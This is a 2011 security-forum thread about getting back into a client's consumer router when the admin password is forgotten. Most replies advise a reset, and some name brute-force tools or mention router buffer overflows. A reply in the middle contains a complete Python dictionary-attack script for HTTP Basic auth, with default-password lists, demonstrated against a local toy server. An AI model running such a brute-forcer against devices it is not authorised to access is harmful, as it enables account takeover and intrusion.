joeypesci Posted March 7, 2011

Is it possible to do a dictionary attack on a router to get the admin password? Haven't got the details of the router yet, but a client has had a stroke so can't remember the login details. They don't want to reset the router and I just wondered if there was a way of brute forcing the password? Before anyone comments: all above board and genuine.
digip Posted March 7, 2011

> Is it possible to do a dictionary attack on a router to get the admin password? Haven't got the details of the router yet, but a client has had a stroke so can't remember the login details. They don't want to reset the router and I just wondered if there was a way of brute forcing the password? Before anyone comments: all above board and genuine.

It's most definitely possible on a consumer router, since they usually don't have any mechanisms to ban you after too many attempts. Nearly every consumer-based router only lets you change the password while keeping the default user name from manufacturing (which is usually admin or root), so if you look up the default user name, if it even takes one, as some only require a single password entered with no user name, then it shouldn't be too hard to brute force it, just time consuming. If anything, it's a waste of time to try brute forcing if you can just reset it. First see if he even changed the default password, and look up the model: http://www.routerpasswords.com/

If it is a consumer router, just reset the damn thing. Takes you 5 minutes to reset everything to what he needs it to be, and you can then change the password and be done with it. I can't see any reason not to reset it unless it were for a corporate network, by which you would have to take it offline to reset anyway. If it's on a corporate network, there isn't a reset button on high-end Cisco equipment (or most other brands either) and you would need to put it in ROMmon mode via console/serial cable to reset the password anyway.
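The attack digip describes, trying a fixed default user name against a wordlist over HTTP Basic auth with no lockout in the way, is simple enough to write out. The following is an added example, not code from this thread or from Hydra/RSYaba: it spins up a constructed local web server that imitates a router admin page (the credentials, realm and wordlist are all made up for the demonstration) and runs a dictionary attack against it, putting typical vendor default passwords first because that alone often works. It stops on any response other than 200 or 401, since a 403, 429 or 5xx may mean the device does have some lockout after all.

```python
"""Dictionary attack against HTTP Basic authentication, the scheme most
consumer router admin pages use. The target is a constructed local test
server standing in for the router, so this runs offline."""
import base64
import http.server
import threading
import urllib.error
import urllib.request
from http import HTTPStatus

# Constructed credentials for the toy target (assumption, not a real device).
TARGET_USER = "admin"
TARGET_PASS = "letmein2011"
REALM = "Broadband Router"


class BasicAuthHandler(http.server.BaseHTTPRequestHandler):
    """Minimal router-style admin page: 401 until the right Basic credentials
    arrive, then 200. No lockout and no delay, like most consumer devices."""

    def do_GET(self):
        expected = base64.b64encode(f"{TARGET_USER}:{TARGET_PASS}".encode()).decode()
        if self.headers.get("Authorization", "") == f"Basic {expected}":
            body = b"<html>Router status</html>"
            self.send_response(HTTPStatus.OK)
        else:
            body = b"Unauthorized"
            self.send_response(HTTPStatus.UNAUTHORIZED)
            self.send_header("WWW-Authenticate", f'Basic realm="{REALM}"')
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the server quiet during the run
        pass


def start_target():
    """Start the toy router on an ephemeral loopback port; return (server, url)."""
    server = http.server.HTTPServer(("127.0.0.1", 0), BasicAuthHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}/"


def try_login(url, user, password, timeout=5):
    """Return True if user:password is accepted (200), False if rejected (401).
    Any other status is re-raised: it may be a lockout or a WAF, so stop and look."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req = urllib.request.Request(url, headers={"Authorization": f"Basic {token}"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status == 200
    except urllib.error.HTTPError as e:
        if e.code == 401:
            return False
        raise


def dictionary_attack(url, users, wordlist):
    """Try every user/password pair in order; return (user, password, attempts)
    on success or None if the wordlist is exhausted."""
    attempts = 0
    for user in users:
        for password in wordlist:
            attempts += 1
            if try_login(url, user, password):
                return user, password, attempts
    return None


# Vendor defaults of the kind routerpasswords.com lists go first, then the
# rest of a (constructed, deliberately short) wordlist.
DEFAULT_PASSWORDS = ["admin", "password", "1234", ""]
CONSTRUCTED_WORDLIST = DEFAULT_PASSWORDS + ["letmein", "router", "letmein2011", "qwerty"]


def demo():
    """Run the attack against the toy router with the default user 'admin'."""
    server, url = start_target()
    try:
        return dictionary_attack(url, ["admin"], CONSTRUCTED_WORDLIST)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(demo())  # ('admin', 'letmein2011', 7)
```

The loop is what `hydra -l admin -P wordlist.txt <router-ip> http-get /` does for you, with threading and more protocols; the point of writing it out is to see why a consumer device with no attempt counter falls to this given enough time and a decent wordlist, and why the "stop on an unexpected status" check matters on anything that does throttle.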
Mr-Protocol Posted March 7, 2011

THC Hydra.

Hit the reset button, takes a whole 5 seconds to reconfigure...
digininja Posted March 7, 2011

Shameless plug, RSYaba: http://www.digininja.org/projects/rsyaba.php

But I agree with Mr-P, unless you are really interested in playing with attack tools then just hit the reset button and reconfigure it.
joeypesci (Author) Posted March 7, 2011

It's what the client wants. No idea why, but they don't want to reset it. Might be the login details for the ISP maybe? I used to be with BT and luckily wrote mine down years ago, then reset the router and had to hunt round for the ISP login details :) I know they could call the ISP I guess. I don't know. Anyway, thanks for the suggestions.
Mr-Protocol Posted March 7, 2011

The clients don't know what is good for them. That's why they are talking to you to do the work.
buffy Posted March 7, 2011

Depending on the version of the router, some have buffer overflows that give you root access; then you can just use passwd. I know the BT Home Hub white box had one.
Infiltrator Posted March 8, 2011

Hydra is quite good for HTTP brute forcing. Used it many times for pen-testing my network. Now on a side note, make sure you have a very long dictionary file.
Mr-Protocol Posted March 8, 2011

It's still a matter of the clients not knowing what they want. You had to have given them some false hope of being able to "recover" the password. That was your first mistake :P. What I do with clients that always call me is set up remote admin, set up DynDNS in the router to auto-update so I always have the IP, and away I go. They never need to know the password. I also write down the admin password and Wi-Fi access passkey/phrase on a piece of paper and tape it to the top/bottom of the router, just so if I forget, they can tell me, and if they forget (typically the Wi-Fi access passkey/phrase) they can just look at the paper taped to the router.
digip Posted March 8, 2011

> It's still a matter of the clients not knowing what they want. You had to have given them some false hope of being able to "recover" the password. That was your first mistake :P. What I do with clients that always call me is set up remote admin, set up DynDNS in the router to auto-update so I always have the IP, and away I go. They never need to know the password. I also write down the admin password and Wi-Fi access passkey/phrase on a piece of paper and tape it to the top/bottom of the router, just so if I forget, they can tell me, and if they forget (typically the Wi-Fi access passkey/phrase) they can just look at the paper taped to the router.

Doh! I can't tell you how many passwords I've found written on a sticky note placed on the bottom of the keyboard.
Infiltrator Posted March 8, 2011

> Doh! I can't tell you how many passwords I've found written on a sticky note placed on the bottom of the keyboard.

I work for an IT company that provides on-site support for police and all the other GOV agencies. Anyway, I've seen worse: they write all their passwords on a sticky note and place them on the monitor itself. Ohh dude, they must be really secure, no one will ever know what their password is. "Sarcasm"
Mr-Protocol Posted March 8, 2011

> Doh! I can't tell you how many passwords I've found written on a sticky note placed on the bottom of the keyboard.

That may be true, but I'm assuming this is a home user, not a business. And if a home user has physical access to the router, or anyone for that matter, why not have the password there? They could just as easily take the damn router...
digininja Posted March 8, 2011

In most situations I don't see the problem with writing a password down and sticking it under the keyboard. If an attacker has physical access then they can quite often do a lot more damage than steal the password. Given the choice of a strong written-down password or a weak one, I'd go for the strong one, as there are many more remote attackers than local ones, so better to defend against the masses than the minority.
Mr-Protocol Posted March 8, 2011

True, and like I said, I do that for the home computer illiterate. So if they don't remember the password, either I will or I can look at the paper on the router itself, to not have to push the reset button. That would be MOST helpful with DD-WRT flashed routers, considering the reset button does not clear passwords.
digip Posted March 8, 2011

> In most situations I don't see the problem with writing a password down and sticking it under the keyboard. If an attacker has physical access then they can quite often do a lot more damage than steal the password. Given the choice of a strong written-down password or a weak one, I'd go for the strong one, as there are many more remote attackers than local ones, so better to defend against the masses than the minority.

The problem I have with written passwords laying about, and this is from where I used to work, is that vendors and outside techs who enter the building can plainly see passwords written on sticky notes attached to monitors as they pass by. Our Xerox techs would have to log on to the SUN stations attached to the printers (they had their own CE logins for maintenance), but they resided in the same rack as some of our other servers in the room we used for printing, which had passwords taped under the keyboards. Easily discoverable, and easily compromised by something as simple as a sticky note on the monitor or keyboard.

I know for a fact that there was a person who I used to work with who used someone else's password to access the internet when they themselves were not allowed to access the internet. This password got shared with other people and was discovered when the employee left the company: their password was still in use before they had time to remove it. All because they stole the one other person's password. So the attacker isn't always someone who might be from the outside; it could be an internal employee using another employee's credentials, and unless they get caught (which they did) you wouldn't be the wiser. In the case of the employee who stole the password, it not only gave them access to the internet proxy, but also to the user's Novell login and shares on the network tree, which if abused could have had disastrous results on the internal corporate network.
digip Posted March 13, 2011

> Shameless plug, RSYaba: http://www.digininja.org/projects/rsyaba.php
>
> But I agree with Mr-P, unless you are really interested in playing with attack tools then just hit the reset button and reconfigure it.

I tried RSYaba on my site, and it worked a charm on my WordPress login. Granted I provided the username and password to use, but it worked flawlessly once I figured out all the switches to add for the password field and username field, cookies, etc. Excellent tool and very easy to use. I see you have it set for HTTP, HTTPS, MySQL and SSH. How hard would it be to modify it for something like, say, FTP, RDP, VNC, etc.? Would these require additional gems alone, or would you need to also write something to speak to these other protocols on top of the gems for them?